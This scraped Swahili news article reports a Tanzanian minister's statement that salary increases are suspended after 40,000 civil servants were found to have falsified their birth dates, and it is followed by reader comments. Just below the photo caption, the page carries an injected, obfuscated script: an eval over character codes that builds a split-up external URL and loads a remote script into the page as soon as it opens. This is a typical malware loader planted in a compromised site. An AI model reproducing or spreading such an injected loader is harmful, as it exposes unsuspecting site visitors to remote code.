Recent Comments

Upandishwaji mishahara wasitishwa kisa waliogushi miaka ya kuzaliwa.

<p>Waziri wa Nchi Ofisi ya Rais, Menejimenti ya Utumishi wa Umma na Utawala Bora, George Mkuchika.</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Inaripotiwa na (Shaaban) kutoka simamia.com

Kwa Ufupi: Ni baada ya madiliko yaliyofanyika kwenye baraza la mawaziri Tanzania Bara.

simamiateam@gmail.com/simamiateam@gmail.com

Dar Es salaam. Waziri wa Nchi Ofisi ya Rais, Menejimenti ya Utumishi wa Umma na Utawala Bora, George Mkuchika amesema watumishi elfu 40 wamebainika kugushi umri wa kuzaliwa.
Akizungumza jijini Dar es salaam wakati akikabidhiwa ofisi na aliyekuwa Waziri wa wizara hiyo Angella Kairuki, Mkuchika amesema kutokana na hali hiyo serikali haitapandisha mishahara hadi hapo zoezi la uhakiki litakapokamilika.

kutokakana na hatua hizi na matamko ya serikali wewe kama mwananchi unazipokeaje hatua hizi, andika maoni yako hapo chini kwenye comment yatawafikia wahusika moja kwa moja.

By Shaban Rashid Said Kisleu Fahari Eliya

Kwa jina anaitwa Shaban Rashid Said Kisleu na ni mhariri hapa Simamia Media Group. Natumaini mtafurahishwa na yake nitakayowaletea na mtaendelea kufatilia mitandao wa Simamia.com Kumfikia, tuma email SimamiaTeam@gmail.com

24 thoughts on “Upandishwaji mishahara wasitishwa kisa waliogushi miaka ya kuzaliwa.”
  1. Ahahahahahaaaaaaaa Tanzania tunatawaliwa kisaniii,kesi ya vyeti hewa haijaisha imeibuka hoja nyingine asante weeeee ila yakiwakuta ninyi mtabadili gia angani kwamba hatakama amedanganya umri kama ana……. Kwenu bado anaumri mdogo

  2. Comment:hawa hawataki kuajiri wala kupandisha mishahara rejea kauli ya rais ya kuwa hatapandisha mshahara kamwe ivo iz ni danadana il cku ziende

  3. Hizo ni sababu za kutoajiri tu nakutopandisha mishaara..wasomi wasio na hatia wanateseka mitaani..nafikiri wakati wanafuatilia hilo wangetoa ajira na kuongeza mishaara ili kunusuru wengine kuteseka….ama kwel hii transitional period twafwaaaa

  4. sheria zinavunjwa haki za watumishi zinakanyagwa kwa matakwa ya watu kila waziri anakuja na lake ajae atasema uraia feki

  5. Comment:Ifike Wakati hawa viongozi Wamuogope Mungu,Maana ni kheri kukaa kimya kuliko kuumiza roho za Wananchi kila uchwao kwa Matamko yasiyo kua na Maana.

  6. Comment:The only way of solving problrms is by attacking it but not escaping from such a problem,ni jambo la ajabu kutoa reason ya kauli ya rais baada ya kugundua kuwa wananchi wamereact na cha ajabu haya mambo yanafanywa na watu ambao wanautashi mzuri tu wa kufikili,kama wanaoonekugushi umri ni 40 je idadi inayobaki kuwa na umri sahihi si ni kubwa,sasa if the government intetion is to solve problem,now it is better to give those who are on valid years their appropriate salaries on time,haiwezekan idadi ndogo iadhibu idadi kubwa

  7. mungu atubariki tanzania iwe ya aman kwa xababu kila kukicha tarifa mbya du.

Comments are closed.